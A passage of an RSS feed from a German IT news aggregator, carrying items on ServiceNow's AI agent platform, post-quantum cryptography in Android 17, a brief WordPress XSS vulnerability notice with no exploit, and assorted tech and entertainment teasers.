<p>And thanks to the <a href="https://www.cio.com/article/4156549/servicenow-rolls-out-context-engine-to-embed-ai-governance-across-its-platform.html" target="_blank">recent acquisition of Traceloop</a>, Control Tower now provides more extensive observability into agent behavior at runtime. Five new risk frameworks aligned with NIST and EU Act standards offer compliance controls.</p>



<h2 class="wp-block-heading">Autonomous workforce</h2>



<p>To expand the reach of what ServiceNow calls the Autonomous Workforce, a group of <a href="https://www.cio.com/article/4138035/servicenow-plans-automation-of-l1-service-desk-roles-promises-more-ai-specialists-to-come.html" target="_blank">specialist AI agents</a> announced in February that began with a single L1 IT service desk agent, it has added “AI teammates” that work alongside humans in CRM, IT, employee services, and security and risk management.</p>



<p>The autonomous IT cohort includes an AIOps agent that detects anomalies, correlates events, and triggers remediation, and a specialist for site reliability engineering (SRE) that performs incident triage and postmortem documentation. Other new agents assist with asset lifecycle management and portfolio planning.</p>



<p>Autonomous CRM offers specialist agents for sales qualification and quoting, order fulfillment, managing invoice disputes, and service and renewal, and in the world of employee services, AI specialists act as digital employees with role-specific skills in HR, workplace services, legal, finance, procurement, supplier management, and health and safety.</p>



<p>To round out the offerings, ServiceNow announced Autonomous Security &amp; Risk, designed to span the entire threat landscape from finding and remediating vulnerabilities through examining third party vendor risk.</p>



<h2 class="wp-block-heading">Employee experience</h2>



<p>ServiceNow EmployeeWorks, the previously announced “conversational front door for the enterprise”, is now generally available. In addition, ServiceNow announced Otto, an AI assistant that unifies Now Assist, Moveworks, and AI Experience, and operates across the enterprise.</p>



<p>“Rather than living inside a single application, ServiceNow Otto sits across the entire enterprise, understanding intent, routing work to the right agent, and executing it to completion,” the company said. “Employees, customers, and support teams talk, chat, search, browse, analyze, and build. ServiceNow Otto is designed to handle the rest, adapting to each employee’s role and location without requiring them to know which system handles their request. Actions are governed by AI Control Tower, which can log each AI interaction, enforce enterprise policies, and provide explainability for every decision.”</p>



<p>Otto is already available in EmployeeWorks and the AI Control Tower, and will be rolled out in all other products “in the year ahead.”</p>



<p>According to <a href="https://www.linkedin.com/in/nenshadbardoliwalla" target="_blank" rel="noreferrer noopener">Nenshad Bardoliwalla</a>, ServiceNow’s group VP of AI products, all this means that “together with a new commercial model that bundles everything customers need to deploy AI quickly, we’ve made it clear the era of sidecar AI is over.”</p>



<p>What technology analyst Carmi Levy finds most interesting in these announcements is how quickly we’re seeing AI-enabled workflows extend beyond their initial entry point in IT.</p>



<p>“What was once the exclusive domain of senior IT leaders and planners is now filtering across all operational areas of the typical organization, including CRM, HR, IT operations, security and risk,” he said. “AI is also deeply embedded in the average worker’s desktop and is rewriting their work experiences in the process. Likewise, it puts highly autonomous tools in the hands of organizations intent on improving productivity, sharpening customer responsiveness, and driving operational efficiencies.”</p>



<p><a href="https://my.idc.com/getdoc.jsp?containerId=PRF004352" target="_blank" rel="noreferrer noopener">Stephen Elliot</a>, group VP at IDC, added, “The agentic focus is critical as the company continues to expand its specialist agent library. Customers can adopt these across core workflows to realize business value and increase productivity. The recent commercial pricing model complements the agentic capabilities. It meets customers where they are in their AI maturity journey enabling a pragmatic approach to adoption.”</p>



<p>But, he added, “Customers should consider the combination of workflows, AI, data, governance, and security as they deploy AI capabilities. No one model can do it all.”</p>



<p>Indeed, he said, “We are hearing from some CIOs that they are pausing some AI use cases because of the security and governance risks.”</p>



<p><a href="https://www.forrester.com/analyst-bio/charles-betz/BIO12104" target="_blank" rel="noreferrer noopener">Charles Betz</a>, VP principal analyst at Forrester, said that ServiceNow is on the right track, especially with its continued focus on data. “The data governance, provenance, and currency issues are not trivial. Agents reasoning at machine speed over a stale graph are going to produce wrong outputs, and it’ll be data-quality-based hallucination,” he said. In addition, “documenting decision traces within the AI domain is super important.”</p>



<p>Levy agreed. “ServiceNow’s offerings reflect a keen understanding of where AI can drive optimal benefit throughout all areas of the business, what those workflows might look like, and how the tools and supports need to evolve,” he said.</p>



<p><em>This story originally appeared on <a href="https://www.cio.com/article/4167410/servicenow-continues-its-ai-transformation-with-an-integrated-experience.html" data-type="link" data-id="https://www.cio.com/article/4167410/servicenow-continues-its-ai-transformation-with-an-integrated-experience.html" target="_blank">CIO.com</a>.</em></p>



<p></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[ServiceNow continues its AI transformation with an integrated experience]]></title>
<description><![CDATA[ServiceNow has unveiled updates to its workflow management platform advancing its redefinition of itself as the “AI control tower for business reinvention” at its Knowledge customer event this week.



The AI Control Tower product itself, introduced at last year’s event, gets new integrations wit...]]></description>
<link>https://tsecurity.de/de/3490539/it-nachrichten/servicenow-continues-its-ai-transformation-with-an-integrated-experience/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3490539/it-nachrichten/servicenow-continues-its-ai-transformation-with-an-integrated-experience/</guid>
<pubDate>Tue, 05 May 2026 20:02:03 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>ServiceNow has unveiled updates to its workflow management platform advancing its redefinition of itself as the “AI control tower for business reinvention” at its Knowledge customer event this week.</p>



<p>The <a href="https://www.networkworld.com/article/3978731/servicenow-launches-ai-agent-command-center-communication-backbone.html">AI Control Tower</a> product itself, introduced at last year’s event, gets new integrations with Microsoft Azure, Amazon Web Services (AWS), Google Cloud Platform (GCP) and other LLM providers to extend governance and observability of enterprise infrastructure, adding to its existing links with <a href="https://www.cio.com/article/4119588/servicenow-deal-will-see-it-embed-openai-models-into-its-ai-platform.html">OpenAI</a> and <a href="https://www.cio.com/article/4124222/servicenow-embeds-anthropic-claude-as-its-default-build-agent-model.html">Anthropic</a>. The integrations also span applications such as SAP, Oracle, and Workday. In addition, Control Tower can now discover non-human identities and connected devices to bring OT and IoT under the same governance as AI agents and cloud services.</p>



<p>All this ties in to the ServiceNow Action Fabric, which opens the platform to any AI agent, whether built on ServiceNow or from another source, via a Model Context Protocol (MCP) server, the company said.</p>



<p>And thanks to the <a href="https://www.cio.com/article/4156549/servicenow-rolls-out-context-engine-to-embed-ai-governance-across-its-platform.html">recent acquisition of Traceloop</a>, Control Tower now provides more extensive observability into agent behavior at runtime. Five new risk frameworks aligned with NIST and EU Act standards offer compliance controls.</p>



<h2 class="wp-block-heading">Autonomous workforce</h2>



<p>To expand the reach of what ServiceNow calls the Autonomous Workforce, a group of <a href="https://www.cio.com/article/4138035/servicenow-plans-automation-of-l1-service-desk-roles-promises-more-ai-specialists-to-come.html">specialist AI agents</a> announced in February that began with a single L1 IT service desk agent, it has added “AI teammates” that work alongside humans in CRM, IT, employee services, and security and risk management.</p>



<p>The autonomous IT cohort includes an AIOps agent that detects anomalies, correlates events, and triggers remediation, and a specialist for site reliability engineering (SRE) that performs incident triage and postmortem documentation. Other new agents assist with asset lifecycle management and portfolio planning.</p>



<p>Autonomous CRM offers specialist agents for sales qualification and quoting, order fulfillment, managing invoice disputes, and service and renewal, and in the world of employee services, AI specialists act as digital employees with role-specific skills in HR, workplace services, legal, finance, procurement, supplier management, and health and safety.</p>



<p>To round out the offerings, ServiceNow announced Autonomous Security &amp; Risk, designed to span the entire threat landscape from finding and remediating vulnerabilities through examining third party vendor risk.</p>



<h2 class="wp-block-heading">Employee experience</h2>



<p>ServiceNow EmployeeWorks, the previously announced “conversational front door for the enterprise”, is now generally available. In addition, ServiceNow announced Otto, an AI assistant that unifies Now Assist, Moveworks, and AI Experience, and operates across the enterprise.</p>



<p>“Rather than living inside a single application, ServiceNow Otto sits across the entire enterprise, understanding intent, routing work to the right agent, and executing it to completion,” the company said. “Employees, customers, and support teams talk, chat, search, browse, analyze, and build. ServiceNow Otto is designed to handle the rest, adapting to each employee’s role and location without requiring them to know which system handles their request. Actions are governed by AI Control Tower, which can log each AI interaction, enforce enterprise policies, and provide explainability for every decision.”</p>



<p>Otto is already available in EmployeeWorks and the AI Control Tower, and will be rolled out in all other products “in the year ahead.”</p>



<p>According to <a href="https://www.linkedin.com/in/nenshadbardoliwalla" target="_blank" rel="nofollow">Nenshad Bardoliwala</a>, ServiceNow’s group VP of AI products, all this means that “together with a new commercial model that bundles everything customers need to deploy AI quickly, we’ve made it clear the era of sidecar AI is over.”</p>



<p>What technology analyst Carmi Levy finds most interesting in these announcements is how quickly we’re seeing AI-enabled workflows extend beyond their initial entry point in IT.</p>



<p>“What was once the exclusive domain of senior IT leaders and planners is now filtering across all operational areas of the typical organization, including CRM, HR, IT operations, security and risk,” he said. “AI is also deeply embedded in the average worker’s desktop and is rewriting their work experiences in the process. Likewise, it puts highly autonomous tools in the hands of organizations intent on improving productivity, sharpening customer responsiveness, and driving operational efficiencies.”</p>



<p><a href="https://my.idc.com/getdoc.jsp?containerId=PRF004352" target="_blank" rel="nofollow">Stephen Elliot</a>, group VP at IDC, added, “The agentic focus is critical as the company continues to expand its specialist agent library. Customers can adopt these across core workflows to realize business value and increase productivity. The recent commercial pricing model complements the agentic capabilities. It meets customers where they are in their AI maturity journey enabling a pragmatic approach to adoption.”</p>



<p>But, he added, “Customers should consider the combination of workflows, AI, data, governance, and security as they deploy AI capabilities. No one model can do it all.”</p>



<p>Indeed, he said, “We are hearing from some CIOs that they are pausing some AI use cases because of the security and governance risks.”</p>



<p><a href="https://www.forrester.com/analyst-bio/charles-betz/BIO12104" rel="nofollow">Charles Betz</a>, VP principal analyst at Forrester, said that ServiceNow is on the right track, especially with its continued focus on data. “The data governance, provenance, and currency issues are not trivial. Agents reasoning at machine speed over a stale graph are going to produce wrong outputs, and it’ll be data-quality-based hallucination,” he said. In addition, “documenting decision traces within the AI domain is super important.”</p>



<p>Levy agreed. “ServiceNow’s offerings reflect a keen understanding of where AI can drive optimal benefit throughout all areas of the business, what those workflows might look like, and how the tools and supports need to evolve,” he said.</p>



<p></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Vom Spiegel zur Sicherheitsplattform im Direkten Sicht-Feld - Magna International]]></title>
<description><![CDATA[*Dieses Dokument wurde unter menschlicher Aufsicht mit Microsoft Translator übersetzt. Portrait of Peter Elliot, Vice President, Information Security, ...]]></description>
<link>https://tsecurity.de/de/3430560/it-security-nachrichten/vom-spiegel-zur-sicherheitsplattform-im-direkten-sicht-feld-magna-international/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3430560/it-security-nachrichten/vom-spiegel-zur-sicherheitsplattform-im-direkten-sicht-feld-magna-international/</guid>
<pubDate>Tue, 14 Apr 2026 04:05:12 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[*Dieses Dokument wurde unter menschlicher Aufsicht mit Microsoft Translator übersetzt. Portrait of Peter Elliot, Vice President, Information <b>Security</b>, ...]]></content:encoded>
</item>
<item>
<title><![CDATA[T. Elliot “Election Subversion” Gaiser Rules President Can Destroy Official Records]]></title>
<description><![CDATA[What’s notable in the latest batshit crazy Trump administration is the role of a legal operative named T. Elliot Gaiser. He clerked for Alito, worked Trump’s 2020 campaign, advised that Pence had a “substantive” role in certification, and is now the author of a Justice Department’s Office of Lega...]]></description>
<link>https://tsecurity.de/de/3404779/it-security-nachrichten/t-elliot-election-subversion-gaiser-rules-president-can-destroy-official-records/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3404779/it-security-nachrichten/t-elliot-election-subversion-gaiser-rules-president-can-destroy-official-records/</guid>
<pubDate>Fri, 03 Apr 2026 09:21:27 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[What’s notable in the latest batshit crazy Trump administration is the role of a legal operative named T. Elliot Gaiser. He clerked for Alito, worked Trump’s 2020 campaign, advised that Pence had a “substantive” role in certification, and is now the author of a Justice Department’s Office of Legal Counsel (OLC) opinion declaring a post-Watergate … <a href="https://www.flyingpenguin.com/t-elliot-election-subversion-gaiser-rules-president-can-destroy-official-records/" class="more-link">Continue reading <span class="screen-reader-text">T. Elliot “Election Subversion” Gaiser Rules President Can Destroy Official Records</span> <span class="meta-nav">→</span></a>]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2024-29125 | Elliot Sowersby Coupon Affiliates Plugin up to 5.12.7 on WordPress cross site scripting]]></title>
<description><![CDATA[A vulnerability classified as problematic was found in Elliot Sowersby Coupon Affiliates Plugin up to 5.12.7 on WordPress. Impacted is an unknown function. Such manipulation leads to cross site scripting.

This vulnerability is documented as CVE-2024-29125. The attack can be executed remotely. Th...]]></description>
<link>https://tsecurity.de/de/3400381/sicherheitsluecken/cve-2024-29125-elliot-sowersby-coupon-affiliates-plugin-up-to-5127-on-wordpress-cross-site-scripting/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3400381/sicherheitsluecken/cve-2024-29125-elliot-sowersby-coupon-affiliates-plugin-up-to-5127-on-wordpress-cross-site-scripting/</guid>
<pubDate>Wed, 01 Apr 2026 20:20:45 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability classified as <a href="https://vuldb.com/kb/risk">problematic</a> was found in <a href="https://vuldb.com/product/elliot_sowersby:coupon_affiliates_plugin">Elliot Sowersby Coupon Affiliates Plugin up to 5.12.7</a> on WordPress. Impacted is an unknown function. Such manipulation leads to cross site scripting.

This vulnerability is documented as <a href="https://vuldb.com/source_cve/257307">CVE-2024-29125</a>. The attack can be executed remotely. There is not any exploit available.]]></content:encoded>
</item>
<item>
<title><![CDATA[Security for the Quantum Era: Implementing Post-Quantum Cryptography in Android]]></title>
<description><![CDATA[Posted by Eric Lynch, Product Manager, Android and Dom Elliot, Group Product Manager, Google Play Modern digital security is at a turning point. We are on the threshold of using quantum computers to solve “impossible” problems in drug discovery, materials…
Read more →
The post Security for the Qu...]]></description>
<link>https://tsecurity.de/de/3380900/it-security-nachrichten/security-for-the-quantum-era-implementing-post-quantum-cryptography-in-android/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3380900/it-security-nachrichten/security-for-the-quantum-era-implementing-post-quantum-cryptography-in-android/</guid>
<pubDate>Wed, 25 Mar 2026 17:22:18 +0100</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Posted by Eric Lynch, Product Manager, Android and Dom Elliot, Group Product Manager, Google Play Modern digital security is at a turning point. We are on the threshold of using quantum computers to solve “impossible” problems in drug discovery, materials…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/security-for-the-quantum-era-implementing-post-quantum-cryptography-in-android/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/security-for-the-quantum-era-implementing-post-quantum-cryptography-in-android/">Security for the Quantum Era: Implementing Post-Quantum Cryptography in Android</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Security for the Quantum Era: Implementing Post-Quantum Cryptography in Android]]></title>
<description><![CDATA[Posted by Eric Lynch, Product Manager, Android and Dom Elliot, Group Product Manager, Google Play


Modern digital security is at a turning point. We are on the threshold of using quantum computers to solve "impossible" problems in drug discovery, materials science, and energy—tasks that even the...]]></description>
<link>https://tsecurity.de/de/3380752/it-security-nachrichten/security-for-the-quantum-era-implementing-post-quantum-cryptography-in-android/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3380752/it-security-nachrichten/security-for-the-quantum-era-implementing-post-quantum-cryptography-in-android/</guid>
<pubDate>Wed, 25 Mar 2026 16:38:17 +0100</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<span class="byline-author">Posted by Eric Lynch, Product Manager, Android and Dom Elliot, Group Product Manager, Google Play</span>

<p>
Modern digital security is at a turning point. <a href="https://blog.google/innovation-and-ai/technology/safety-security/the-quantum-era-is-coming-are-we-ready-to-secure-it/">We are on the threshold of using quantum computers to solve "impossible" problems</a> in drug discovery, materials science, and energy—tasks that even the most powerful classical supercomputers cannot handle. However, the same unique ability to consider different options simultaneously also allows these machines to bypass our current digital locks. This puts the public-key cryptography we’ve relied on for decades at risk, potentially compromising everything from bank transfers to trade secrets. To secure our future, it is vital to adopt the new Post-Quantum Cryptography (PQC) standards National Institute of Standards and Technology (NIST) is urging before large-scale, fault-tolerant quantum computers become a reality.
</p>
<p>
To stay ahead of the curve, the technology industry must undertake a proactive, multi-year migration to Post-Quantum Cryptography (PQC). We have been <a href="https://blog.google/innovation-and-ai/technology/safety-security/the-quantum-era-is-coming-are-we-ready-to-secure-it/">preparing for a post-quantum world since 2016</a>, conducting pioneering experiments with post-quantum cryptography, rolling out post-quantum capabilities in our products, and sharing our expertise through threat models and technical papers. For Android, the objective extends beyond patching individual applications or transport protocols. The imperative is to ensure that the entire platform architecture is resilient for the decades to come.
</p>
<p>
We are beginning tests of PQC enhancements starting in the next Android 17 beta, followed by general availability in the Android 17 production release. This deployment introduces a comprehensive architectural upgrade that is being rolled out across the operating system. By integrating the recently finalized <a href="https://www.nist.gov/pqc">NIST PQC standards</a> deep into the platform, we’re establishing a new, quantum-resistant chain of trust. This chain of trust secures the platform continuously—from the moment the OS powers on, to the execution of applications distributed globally. Android is swapping today’s digital locks for advanced encryption to help enhance the security of every app you download—no matter how powerful future supercomputers get.
</p>
<h3>Securing the foundation: Verified boot and hardware trust</h3>


<p>
Security on any computing device begins when the hardware starts; if the underlying operating system is compromised, all subsequent software protections fail. As quantum computing advances, adversaries could potentially forge digital signatures to bypass these foundational integrity checks. To secure the platform against this looming threat, Android 17 introduces two major post-quantum cryptographic (PQC) upgrades:
</p>
<ol>

<li><strong>Upgrading Android Verified Boot (AVB):</strong> The AVB library is integrating the Module-Lattice-Based Digital Signature Algorithm (ML-DSA). This provides quantum-resistant digital signatures, ensuring the software loaded during the boot sequence remains highly resistant to unauthorized modification.</li>

<li><strong>Migrating Remote Attestation:</strong> Android 17 begins the transition of Remote Attestation to a fully PQC-compliant architecture under the current standards. By updating KeyMint's certificate chains to support quantum-resistant algorithms, devices can securely prove their state to relying parties, maintaining trust in a post-quantum environment.</li>
</ol>
<p>

</p><div class="separator"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhb5lOnA0GCP-Le-JkSsDvVv50etaBwWjTGUzmKcqN92u9L1qVjVZTa5Ij9_Q-GSrHrfW55y_tQbPPgMbdT-VMh3FQecBdPbqiKLEV502tDWKZMz48PGMWtgFzFJFQGAZ8R0rFf-vCcSwHK73632o8eKa78uvvhrq9OGDwgmtnzdbkJjymnAtGbk_SXKeO2/s1600/Blog%20Post%20-%20Post%20Quantum%20Chain%20of%20Trust%20-%20inline%20v03.jpg"><img alt="" border="0" data-original-height="1080" data-original-width="1920" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhb5lOnA0GCP-Le-JkSsDvVv50etaBwWjTGUzmKcqN92u9L1qVjVZTa5Ij9_Q-GSrHrfW55y_tQbPPgMbdT-VMh3FQecBdPbqiKLEV502tDWKZMz48PGMWtgFzFJFQGAZ8R0rFf-vCcSwHK73632o8eKa78uvvhrq9OGDwgmtnzdbkJjymnAtGbk_SXKeO2/s1600/Blog%20Post%20-%20Post%20Quantum%20Chain%20of%20Trust%20-%20inline%20v03.jpg"></a></div>


<h3>Empowering developers: Android Keystore updates</h3>


<p>
Protecting the underlying operating system is only the first layer of defense; developers must be equipped with the cryptographic primitives necessary to leverage PQC keys and establish robust identity verification.
</p>
<p>
Implementing lattice-based cryptography, which requires significantly larger key sizes and memory footprints than classical elliptic curve cryptography, within the severely resource-constrained Trusted Execution Environment (TEE), represents a major engineering achievement. This capability is designed to support the hardware roots of trust and can now generate and verify post-quantum signatures.
</p>
<p>
Building on this hardware foundation, Android 17 updates Android Keystore to natively support ML-DSA. This allows applications to leverage quantum-safe signatures entirely within the device’s secure hardware, isolating sensitive key material from the main operating system. The SDK exposes both ML-DSA-65, and ML-DSA-87, enabling developers to seamlessly integrate these using the standard <a href="https://developer.android.com/reference/java/security/KeyPairGenerator">KeyPairGenerator</a> API. This establishes a new era of identity and authentication for the app ecosystem without requiring developers to engineer proprietary cryptographic implementations.
</p>
<h3>Ecosystem scale: Bringing hybrid signing to Google Play apps and games </h3>


<p>
Android is committed to ensuring the platform is PQC resistant and extending the chain of PQC resistance to application signatures. The mechanisms used to verify the authenticity of applications are being upgraded to ensure that app installations and subsequent updates are strictly tamper-proof against quantum-enabled signature forgery. The platform will verify PQC signatures over APKs to enable this chain of trust.
</p>
<p>
To bring these critical protections to the wider developer community with minimal friction, the transition will be supported through Play App Signing. This approach provides an immediate bridge to quantum safety for the majority of active installs. Google Play will let developers automatically generate 'hybrid' signature blocks that combine classical and PQC keys.
</p>
<p>
Updating keys across billions of active devices is a complex operational endeavor. Play App Signing leverages <a href="https://cloud.google.com/security/products/security-key-management">Google Cloud KMS</a>, which helps ensure  industry-leading compliance standards, to secure signing keys. By managing signing keys securely in the cloud, Google Play enables developers to seamlessly upgrade their app security to PQC standards without the burden of complex, manual key management.
</p>
<p>
During the Android 17 release cycle, Google Play will handle the generation of quantum-safe ML-DSA signing keys for new apps and existing apps that opt-in, independent of the applications target API . Later, developers will be able to choose their own classical and ML-DSA signing keys and delegate them to Google Play for their hybrid key upgrade. To promote security best practices, Google Play will also start prompting developers to upgrade their signing keys at least every two years.
</p>
<h3>The cryptographic roadmap: From authenticity to privacy</h3>


<p>
<a href="https://security.googleblog.com/2016/07/experimenting-with-post-quantum.html">Google’s post-quantum transition began in 2016</a>, and Android 17 marks the first phase of Android’s post-quantum transition:
</p>
<ul>

<li><strong>Securing the foundation</strong>: We are upholding the integrity of our attestation and Chain of Trust by incorporating ML-DSA into Android Verified Boot.</li>

<li><strong>Empower Developers</strong>: The inclusion of ML-DSA support within Android Keystore and Play App Signing allows developers to safeguard their users and application. </li>

<li><strong>Ecosystem Scale</strong>: By using hybrid signatures for APKs, developers can create a protected transition that preserves current trust while adding post-quantum defenses to block unauthorized updates.</li>
</ul>
<p>
Our roadmap further integrates post-quantum key encapsulation into KeyMint, Key Attestation and Remote Key Provisioning. This evolution is intended to bolster the security of the entire identity lifecycle—from hardware-level DICE measurements to our remote attestation servers—ensuring the Android ecosystem remains resilient and private against the quantum threats of tomorrow.
</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Scrubs-Quiz: Habt ihr das Zeug zum Serien-Chefarzt, oder seid ihr nur Bambis?]]></title>
<description><![CDATA["Scrubs" kehrt zurück! Zum Start vom großen Revival auf Disney+ könnt ihr mit unserem Quiz beweisen, ob ihr echte Fans von J.D., Turk, Elliot & Co seid.
																					Dieser Artikel wurde einsortiert unter 
																	TV-Serie / Webserie,																	Entertainment,															...]]></description>
<link>https://tsecurity.de/de/3379971/it-nachrichten/scrubs-quiz-habt-ihr-das-zeug-zum-serien-chefarzt-oder-seid-ihr-nur-bambis/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3379971/it-nachrichten/scrubs-quiz-habt-ihr-das-zeug-zum-serien-chefarzt-oder-seid-ihr-nur-bambis/</guid>
<pubDate>Wed, 25 Mar 2026 13:18:29 +0100</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA["Scrubs" kehrt zurück! Zum Start vom großen Revival auf Disney+ könnt ihr mit unserem Quiz beweisen, ob ihr echte Fans von J.D., Turk, Elliot &amp; Co seid.
																					Dieser Artikel wurde einsortiert unter 
																	<a href="https://www.netzwelt.de/serien/index.html">TV-Serie / Webserie</a>,																	<a href="https://www.netzwelt.de/video/index.html">Entertainment</a>,																	<a href="https://www.netzwelt.de/serien/index.html">Serien</a>,																	<a href="https://www.netzwelt.de/disney-plus/index.html">Disney+</a>,																	<a href="https://www.netzwelt.de/serien/scrubs-anfaenger/">Scrubs: Staffeln und Episodenguide</a>,																	<a href="https://www.netzwelt.de/disney-plus/neu-filme-serien-abo-kosten-starts-neuheiten-index.html">Neu auf Disney+: Diese Film- und Serienneuheiten starten im März 2026</a>.]]></content:encoded>
</item>
<item>
<title><![CDATA[Wie Deutschland die Welt ausspioniert hat]]></title>
<description><![CDATA[Author: Simplicissimus - Bewertung: 8500x - Views:70381 In der CLARK - App kannst du dich von Experten zu deinen Versicherungen beraten lassen. Für die ersten drei hochgeladenen Versicherungen sicherst du dir mit dem Code “SIMPLI” Gutscheine im Wert von bis zu 45€ unter https://simpli.deals/clark...]]></description>
<link>https://tsecurity.de/de/3311005/it-security-nachrichten/wie-deutschland-die-welt-ausspioniert-hat/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3311005/it-security-nachrichten/wie-deutschland-die-welt-ausspioniert-hat/</guid>
<pubDate>Wed, 25 Feb 2026 22:06:50 +0100</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Author: Simplicissimus - Bewertung: 8500x - Views:70381 <br/></p><p><iframe id="ytplayer" loading="lazy" type="text/html" width="100%" height="auto" src="https://www.youtube.com/embed/iv-22PPfpYE?autoplay=1&origin=http://tsecurity.de" frameborder="0"></iframe></p><p>In der CLARK - App kannst du dich von Experten zu deinen Versicherungen beraten lassen. Für die ersten drei hochgeladenen Versicherungen sicherst du dir mit dem Code “SIMPLI” Gutscheine im Wert von bis zu 45€ unter https://simpli.deals/clark26 (Werbung)<br />
<br />
Schütze dich beim Surfen im Internet und sichere dir jetzt einen besonders hohen Rabatt, sowie 4 Monate extra auf den 2-Jahresplan mit unserem Code „SIMPLI“. http://www.nordvpn.com/simpli (Werbung)<br />
<br />
Das ist Operation Rubikon - einer der größten Geheimdienst-Coups des 20. Jahrhunderts.<br />
<br />
<br />
Checkt Unfassbar ab: @unfassbar<br />
https://www.youtube.com/@UC9h7UoNb95t_b5A4eHmRnFw <br />
<br />
Spotify: https://spoti.fi/3Y1qYKJ<br />
Apple Podcasts: https://apple.co/4eToIMA<br />
Amazon Music: https://amzn.to/3Y7TEll<br />
RSS-Feed: https://anchor.fm/s/fc0e8c18/podcast/rss<br />
<br />
------<br />
<br />
Danke an unsere Patrons:   / simplicissimus  <br />
https://www.patreon.com/simplicissimus<br />
<br />
Simpli auf Instagram:   / simplicissimusyt  <br />
https://www.instagram.com/simplicissimusyt<br />
<br />
Simpli auf TikTok:   / simplicissimus<br />
https://www.tiktok.com/@simplicissimus<br />
<br />
<br />
Quellen: https://docs.google.com/document/d/1l6kct-p1GyZ25_kkAraAgpp98wyQsIE74L398-M3AVU/edit?usp=sharing<br />
<br />
<br />
Musik:<br />
<br />
Epidemic Sound:<br />
Elm Lake - Epic Triumph<br />
Experia - Criminal Behavior; Underlying Cause; In War We Shall Rise; Foreboding Whispers<br />
Stefan Ekstrom - A Truth Unwanted; The Light Reveals What Darkness Hides<br />
Skrya - Chasing Cars; Hiding DNA<br />
Edward Karl Hanson - Stocktown Disturbance<br />
Christoffer Moe Ditlevsen - Tracker<br />
Anthony Earls - Singular Mind<br />
From Now On - Challenges Ahead<br />
John Runefelt - Can I Hold You Again<br />
Hanna Ekstrom - The Search<br />
Elliot Holmes - Dead Man's Getaway; Stepping Out; Nightclub Standoff<br />
Isaac Larson - Straight Flush; Strictly Speaking<br />
Walt Adams - Loose Bolts<br />
Mike Franklyn - House of Go<br />
Luella Gren - Confused, Depressed and Disturbed<br />
Jay Varton - The Scientist<br />
Ruiqi Zhao - The Deal<br />
Hampus Naeselius - Darkest of Demons; Blood Money; Blush Response<br />
Lofive - 85<br />
Bonn Fields - Over the Treetops<br />
Dian Shuai - One Step Away<br />
Farrell Wooten - Hunter Hunted; The Haunting<br />
Fredrik Ekstrom - Fire Storm 3; Tension 1<br />
Jo Wandrini - Druid Lands<br />
Anna Dager - Remorse of a Murderer<br />
Max Anson - Fire on the Bridge<br />
Magnus Ludvigsson - Unsolved Issues<br />
Paisley Pink - Come Away With Me (Instrumental Version)<br />
Dream Cave - Throbbing Anxiety; Something Peculiar<br />
Damon Greene - Down the Alleyway<br />
Wendel Scherer - Deserted Island<br />
Prozody - Idler<br />
Alec Slayne - Stimuli<br />
Christophe Gorman - False Route<br />
DEX 1200 - Echoes of the Unmasked<br />
Rachel Sandy - A Sickness of Sorts<br />
<br />
Artlist:<br />
Avshalom - Part of Me<br />
Sandy Pierce - Loose Ends<br />
Jeremy Chontow - Wildfire<br />
<br />
Audiio:<br />
Eleonora Pellegrino - Everything Seems Fine (Instrumental)<br />
<br />
<br />
<br />
_____<br />
<br />
Schön, verständlich, kritisch und fundiert. Wir machen Essays zu Fragen, die du dir noch nie, oder viel zu oft gestellt hast.<br/></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[New Relic connects observability platform to business outcomes]]></title>
<description><![CDATA[New Relic this week updated its observability platform with new capabilities designed to tie application health and performance directly to business outcomes. The updates will help enterprises that are embedding AI into revenue-generating applications and using code generation tools in their soft...]]></description>
<link>https://tsecurity.de/de/3307767/it-security-nachrichten/new-relic-connects-observability-platform-to-business-outcomes/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3307767/it-security-nachrichten/new-relic-connects-observability-platform-to-business-outcomes/</guid>
<pubDate>Tue, 24 Feb 2026 17:35:40 +0100</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



